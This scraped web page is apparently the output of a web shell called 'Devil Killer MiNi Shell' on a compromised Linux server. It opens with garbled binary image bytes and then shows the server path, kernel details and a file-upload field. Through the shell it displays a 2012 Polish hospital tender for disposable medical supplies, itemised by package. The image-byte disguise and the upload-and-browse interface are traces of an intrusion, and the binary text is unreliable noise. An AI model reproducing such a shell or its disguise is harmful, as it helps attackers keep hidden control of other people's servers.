JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120601/184552-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Dostawa sprzętu medycznego jednorazowego  użytku , materiałów diagnostycznych</b><br>
<b>Numer ogłoszenia: 184552 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piekarskie Centrum Medyczne Sp. z o.o. , ul. Szpitalna 11, 41-940 Piekary Śląskie, woj. śląskie, tel. 32 39 38 100, faks 32 39 38 127.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieli Zdrowotnej Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego jednorazowego  użytku , materiałów diagnostycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa sprzętu medycznego jednorazowego  użytku , materiałów diagnostycznych z podziałem na pakiety na potrzeby  Piekarskiego Centrum Medycznego Sp. z o.o. 
2.Szczegółowy wykaz asortymentowo- ilościowy   zawiera Załącznik nr 4 formularz cenowy. 
3.Zaoferowane do przetargu wyroby winny spełniać warunki dopuszczenia do obrotu i stosowania  określone w  ustawie  z dnia 20.05.2010 r. o wyrobach medycznych ( Dz.U. z 2010 r. Nr 107, poz. 679 ), a także odpowiadać wszystkim  wymaganiom stawianym przez Zamawiającego  w specyfikacji istotnych warunków zamówienia. 
4.Oferowane do przetargu wyroby muszą być zgodne z opisem Zamawiającego  oraz spełniać wszystkie  postawione wymagania.
5.Dostarczane wyroby muszą być odpowiednio opakowany i oznakowany etykieta zawierającą nazwę wyrobu, firmy i adres wytwórcy oraz autoryzowanego przedstawiciela - dystrybutora- importera; informacje niezbędne do identyfikacji wyrobu i zawartości opakowania; daty ważności, seria lub kod;  wyraz JAŁOWE, STERYLNE  jeżeli dotyczy; metoda sterylizacji, jeżeli dotyczy; znak CE z numerem jednostki notyfikowanej, jeżeli brała udział w ocenie zgodności.
6.Podane w załączniku nr 4 ilości  zostały ustalone przez analogie do zużycia  w minionym okresie  i należy je traktować je jako orientacyjne. Ilości te mogą w trakcie realizacji umowy ulec zmianie. Ilość zamawianych wyrobów zawsze będzie  uzależniona od rzeczywistych potrzeb szpitala i ilości pacjentów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.10-6, 33.19.41.20-3, 33.19.42.20-4, 33.14.16.10-9, 33.14.10.00-9, 33.14.12.00-2, 33.14.16.40-8, 33.14.14.11-4, 33.14.16.41-5, 33.14.16.20-2, 33.19.23.20-1, 33.14.16.15-4, 33.68.00.00-8, 33.11.57.11-0, 33.79.30.00-5, 33.12.41.30-5, 33.14.12.20-8, 33.15.70.00-5, 33.14.13.21-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 . Zamawiający przy ocenie spełnienia warunku udziału w postępowaniu zastosuję formułę spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełnione i podpisane oświadczenie o spełnieniu przez oferowane wyroby obowiązujących norm i przepisów w szczególności ,iż są dopuszczone  do obrotu i stosowania zgodnie z   ustawą  z dnia 20.05.2010 r. o wyrobach medycznych ( Dz.U. z 2010 r. Nr 107, poz. 679 ) - Załącznika nr 3  do specyfikacji</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane dokumenty:
a) wypełnioną i podpisaną ofertę na formularzu Oferta  ( Załącznik nr 1 do specyfikacji), 
b)pełnomocnictwo do reprezentowania Wykonawcy, jeżeli ofertę podpisuje osoba nie       wymieniona w dokumencie określającym status prawny wykonawcy,
c) wypełniony i podpisany  formularz cenowy ( Załącznik Nr  4) .Wykonawcy składają       formularze cenowe odrębnie dla każdego pakietu, do którego przystępują.  W ramach pakietu muszą być wycenione  wszystkie wskazane pozycje. 
d) zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli dotyczy danego wykonawcy w celu zweryfikowania czy oferta podpisana jest przez osobę uprawniona do reprezentowania Wykonawcy.
e) W zakresie oferowanych wyrobów wykonawcy winni złożyć:
- próbki kaniuli do długotrwałych wlewów ( Pakiet nr 3 i 4) po 4 szt  każdego rozmiaru  wskazanego w wykazie -  załączniku 4 .Próbki posłużą do sprawdzenia czy wyroby odpowiadają postawionym wymaganiom, do oceny jakości a w przyszłości do weryfikacji przy realizacji dostaw</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W trakcie obowiązywania umowydopuszczasię zmiany cen w przypadku zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
2.Dopuszczasię możliwość zmiany ceny na korzystniejszą dla Zamawiającego w trakcie trwania umowy , bez konieczności starań ze strony Zamawiającego.  
3.Zmiany cen, o których mowa w pkt1 i 2  nie wymagają konieczności aneksowania umowy.
4.Dopuszcza się zmianę cen jednostkowych towarów objętych umową 
w przypadku zmiany wielkości opakowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową.
5.Dopuszcza się następujące zmiany  postanowień zawartej umowy w stosunku do treści oferty, na podstawie , której dokonano wyboru wykonawcy :
a)   zmiana osób upoważnionych do kontaktowania się w sprawie umowy w przypadku rozwiązania umowy o pracę z tymi osobami, lub innych zmian organizacyjnych w strukturze kadrowej Zamawiającego lub Wykonawcy,
b) zmiana wielkości opakowania produktów, w przypadku braku dostępności.
2. Dopuszcza się również możliwość zmiany umowy w części dotyczącej producenta, nazwy handlowej, kodu dostarczonego przedmiotu zamówienia jeśli na skutek zaprzestania lub wstrzymania produkcji, wycofania wyroby z obrotu ( w szczególności na podstawie decyzji właściwych władz ) nie jest możliwe dostarczenie asortymentu określonego w ofercie pod warunkiem, iż nowy zaoferowany przez Wykonawcę produkt posiada parametry nie gorsze niż produkt wskazany w ofercie a Zamawiający go zaakceptuje. 
Powyższe zmiany nie mogą skutkować wzrostem cen przedmiotu zamówienia. 
Po stronie Wykonawcy leży obowiązek udokumentowania powyższych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.pkiekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-940 Piekary Śląskie, ul. Szpitalna 11. Specyfikacja w wersji papierowej udostępniana odpłatnie na wniosek Wykonawcy. Cena 20 PLN za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 10:00, miejsce: Sekretariat Zamawiającego pod adresem 41-940 Piekary Śląskie, ul. Szpitalna 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drobny sprzet : Pojemnik plastikowy REDON 200ml sterylne	Szt.	600
Worki do zbiórki moczu dla noworodków  - dziewczynek i  chłopców	Szt.	120
Opaska identyfikacyjna dla noworodów	Szt.	2500 
Zestawy do lewatyw	Szt.	2400 
Wieszaki do worków na mocz	Szt.	1500 
Opaska identyfikacyjna dla dorosłych	Szt.	600 
Elektrody do EKG j.uż. dla dorosłych z żelem	Szt.	27000
Elektrody do EKG j.uż. dla dzieci z żelem	Szt.	100
Żel do USG  x 0,5 litra	Op.	600
Żel do EKG  x  0,5 litra	Op.	100
Szkiełka cięte szlifowane z matowym polem do opisu  rozm. 76x26 w opakowaniu x50szt.	Op.	80
Worki na mocz z odpływem 2 litry niesterylne lub sterylne	Szt.	5000
Folia przeciwwstrząsowa tzw.  koc życia 240cmx160cm	Szt 	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9, 33.79.30.00-5, 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła j.uż. 0,5 -0,9   x 100 szt.	Op.	2000
Igła j.uż. 1,1 x 100 szt	Op.	350
Igła j.uż. 1,2 x 100 szt	Op.	300
Strzykawka j.u.ż. Tuberkulinówka	Szt.	1500
Strzykawka j.u.ż. 2 ml 	Szt.	30000
Strzykawka j.u.ż. 5 ml,	Szt.	90000
Strzykawka j.u.ż. 10 ml	Szt.	80000
Strzykawka j.u.ż. 20 ml 	Szt.	90000
Strzykawka j.u.ż. 50 m	Szt.	4000
Przyrząd do przetaczania płynów bezftalowe	Szt.	80000
Przyrząd do przetaczania krwi bezftalowe	Szt.	3000
Igła do peanów ( wstrzykiwania insuliny )	Szt.	7000
Strzykawka JANETA z długim końcem poj. 100 ml do karmienia	Szt.	1000
Igła typu  motylek do krótkotrwałych wlewów z zabezpieczeniem igły po użyciu obsług. Jedną ręką, ułatwiający mocowanie rozmiar 19(1,1 mm) przepływ 55 ml/ min	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.10-6, 33.19.41.20-3, 33.19.42.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaniula do długotrwałych wlewów  0,8 / G 22, 1,0 / G 20,1,2 / G 18posiadające zabezpieczenie w postaci zastawki antyzwrotnej zapobiegającej zwrotnemu wypływowi krwi w momencie wkłucia,  wykonane z PTFE,   przepływy, długości, średnice zewnętrzne  zgodne z  dopuszczonymi standardami, minimum 4 paski radiacyjne	szt	40000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaniula do długotrwałych wlewów  noworodkowa 0,7 / G 24 x 19 mm przepływie max 13 ml/min. bez portu bocznego ze zdejmowanym uchwytem ułatwiającym wprowadzanie kaniuli do naczynia, wykonana z PTFE, minimum 4 paski radiacyjne	szt	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adapter tzw.  mini spike plus  z filtrem  do pobierania  strzykawką płynów infuzyjnych,  leków z butelek, fiolek wyposażony w filtr antybakteryjny, osłonę portu z samozamykającą się zatyczką	szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurka intubacyjna bez mankietem posiadające linie RTG na całej długości rurki, rozmiar 2,0 ; 2,5 ; 3,0 ; 3,5; 4	Szt.	20
Rurka intubacyjna z mankietem niskociśnieniowym silikonowane, ze skalą  co 1 lub 2 cm,  Rozmiar 6,0 ; 7,5 ; 7,0 ; 8,0 ; 8,5;  9,0	Szt.	1800
Rurki ustno-gardłowe  0,0 ; 1,0 ; 2,0 ; 3,0 ; 4,0 	Szt.	1000
Prowadnica do rurek intubacyjnych 4 mm z miękka końcówką	Szt.	700
Rurki intubacyjne zbrojone z mankietem niskociśnieniowym 7,0 ;7,5;  9,0 ; 8,0 ; 8,5; 5,0   ze skalą  co 1cm	Szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.70.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły do znieczulenia podpajęczynówkowego  25 G x 90 z igła prowadzącą 20 G x 34mm	Szt.	150
Igły do znieczulenia podpajęczynówkowego  27 G x 90 z igła prowadzącą 22 G x 34mm	Szt.	30
Igły do znieczulenia podpajęczynówkowego  26 G x 90 z igła prowadzącą 20 G x 34mm	Szt.	30
Igły do znieczulenia podpajęczynówkowego  26 G typ PENCIL-POINT  z igła prowadzącą 20 G x 34mm	Szt.	150
Igły do znieczulenia podpajęczynówkowego  25 G x 120 z igła prowadzącą 20 G x 34mm	Szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr oddechowy sterylny antybakteryjny /antywirusowy  elektrostatyczny z potrem, możliwością podłączenia kapnometrii , z gąbkowym wymiennikiem ciepła i wilgoci,  o skuteczności filtracji  bakterii i wirusów nie mniejszej niż 99,999%., 	szt	1800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.70.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do drenażu opłucnej z drenem, na trokarze z trójgrańcem 200/900/280	Szt.	40
Zestaw do punkcji opłucnej j.uz.	Szt.	80
Zestaw do drenażu po usunięciu tarczycy, dwa dreny Ulmera poj. 100 ml	Szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
